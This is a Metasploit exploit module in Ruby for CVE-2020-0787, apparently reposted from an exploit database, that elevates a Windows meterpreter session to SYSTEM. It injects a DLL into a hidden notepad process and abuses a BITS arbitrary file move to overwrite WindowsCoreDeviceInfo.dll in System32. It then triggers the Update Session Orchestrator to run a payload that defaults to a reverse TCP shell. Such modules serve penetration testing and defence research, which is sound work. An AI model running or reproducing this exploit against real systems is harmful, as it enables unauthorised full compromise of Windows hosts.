Background Intelligent Transfer Service Privilege Escalation

Related Vulnerabilities: CVE-2020-0787   CVE-2020-0787   CVE-2020-0688  
Publish Date: 11 Jun 2020
                ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE # Needed for generate_payload_dll
  include Msf::Post::Windows::FileSystem
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',
        'Description' => %q{
          This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the
          Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll
          with a malicious DLL containing the attacker's payload.

          To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which
          will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking
          issue within the Update Session Orchestrator Service.

          Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the
          Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,
          so your mileage may vary on Windows Server 2016 and later.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'itm4n', # PoC
            'gwillcox-r7' # msf module
          ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Privileged' => true,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' =>
          [
            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2020-03-10',
        'References' =>
          [
            ['CVE', '2020-0787'],
            ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],
            ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],
            ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],
            ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
            ['URL', 'https://itm4n.github.io/usodllloader-part1/'],
            ['URL', 'https://itm4n.github.io/usodllloader-part2/'],
          ],
        'Notes' =>
          {
            'SideEffects' => [ ARTIFACTS_ON_DISK ],
            'Reliability' => [ REPEATABLE_SESSION ],
            'Stability' => [ CRASH_SAFE ]
          },
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread',
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
            'WfsDelay' => 900
          }
      )
    )

    register_options([
      OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),
      OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])
    ])
  end

  def target_not_presently_supported
    print_warning('This target is not presently supported by this exploit. Support may be added in the future!')
    print_warning('Attempts to exploit this target with this module WILL NOT WORK!')
  end

  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
    end

    # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
    build_num_raw = session.shell_command_token('cmd.exe /c ver')
    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
    if build_num.nil?
      print_error("Couldn't retrieve the target's build number!")
    else
      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
      print_status("Target's build number: #{build_num}")
    end

    # see https://docs.microsoft.com/en-us/windows/release-information/
    unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1903)/
      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
    end

    build_num_gemversion = Gem::Version.new(build_num)

    # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
    if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909
      return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903
      return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809
      return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803
      return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709
      return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703
      return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607
      return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511
      return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507
      return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2
      target_not_presently_supported
      return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012
      target_not_presently_supported
      return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2
      target_not_presently_supported
      return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
    elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2
      target_not_presently_supported
      return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')
    else
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
    end
  end

  def check_target_is_running_supported_windows_version
    if sysinfo['OS'].match('Windows').nil?
      fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
    elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?
      fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')
    end
  end

  def check_target_and_payload_match_and_supported(client_arch)
    if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)
      fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')
    end
    payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.
    if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)
      fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch})") # Unsupported architecture, so return an error.
    end
    if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))
      fail_with(Failure::BadConfig, "Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!")
    end
  end

  def check_windowscoredeviceinfo_dll_exists_on_target
    # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.
    #
    # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.
    # The second part of this exploit will trigger a Update Session to be created so that this DLL
    # is loaded, which will result in arbitrary code execution as SYSTEM.
    #
    # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure
    # that they want to overwrite the file.
    win_dir = session.sys.config.getenv('windir')
    normal_target_payload_pathname = "#{win_dir}\\System32\\WindowsCoreDeviceInfo.dll"
    wow64_target_payload_pathname = "#{win_dir}\\Sysnative\\WindowsCoreDeviceInfo.dll"
    wow64_existing_file = "#{win_dir}\\Sysnative\\win32k.sys"
    if file?(wow64_existing_file)
      if file?(wow64_target_payload_pathname)
        print_warning("#{wow64_target_payload_pathname} already exists")
        print_warning('If it is in use, the overwrite will fail')
        unless datastore['OVERWRITE_DLL']
          print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')
          fail_with(Failure::BadConfig, "#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false")
        end
      end
      target_payload_pathname = wow64_target_payload_pathname
    elsif file?(normal_target_payload_pathname)
      print_warning("#{normal_target_payload_pathname} already exists")
      print_warning('If it is in use, the overwrite will fail')
      unless datastore['OVERWRITE_DLL']
        print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')
        fail_with(Failure::BadConfig, "#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false")
      end
      target_payload_pathname = normal_target_payload_pathname
    end
    target_payload_pathname
  end

  def launch_background_injectable_notepad
    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{process.pid} launched.")
    process
  rescue Rex::Post::Meterpreter::RequestError
    # Sandboxes could not allow to create a new process
    # stdapi_sys_process_execute: Operation failed: Access is denied.
    print_error('Operation failed. Trying to elevate the current process...')
    process = client.sys.process.open
    process
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Step 1: Check target environment is correct.
    print_status('Step #1: Checking target environment...')
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
    client_arch = sysinfo['Architecture']
    check_target_is_running_supported_windows_version
    check_target_and_payload_match_and_supported(client_arch)
    check_windowscoredeviceinfo_dll_exists_on_target

    # Step 2: Generate the malicious DLL and upload it to a temp location.
    print_status('Step #2: Generating the malicious DLL...')
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')
    datastore['EXE::Path'] = path
    if client_arch =~ /x86/i
      datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')
      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')
      library_path = ::File.expand_path(library_path)
    elsif client_arch =~ /x64/i
      datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')
      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')
      library_path = ::File.expand_path(library_path)
    end

    payload_dll = generate_payload_dll
    print_status("Payload DLL is #{payload_dll.length} bytes long")
    temp_directory = session.sys.config.getenv('%TEMP%')
    malicious_dll_location = "#{temp_directory}\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'
    write_file(malicious_dll_location, payload_dll)
    register_file_for_cleanup(malicious_dll_location)

    # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.
    print_status('Step #3: Loading the exploit DLL to run the main exploit...')
    process = launch_background_injectable_notepad

    print_status("Injecting DLL into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    dll_info_parameter = malicious_dll_location.to_s
    payload_mem = inject_into_process(process, dll_info_parameter)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('DLL injected. Executing injected DLL...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_status("Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...")
    sleep datastore['JOB_WAIT_TIME']

    register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
    # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.

    print_status("Starting the interactive scan job...")
    # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload
    # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
    session.shell_command_token('usoclient StartInteractiveScan')

    print_status("Enjoy the shell!")
  end
end
<p>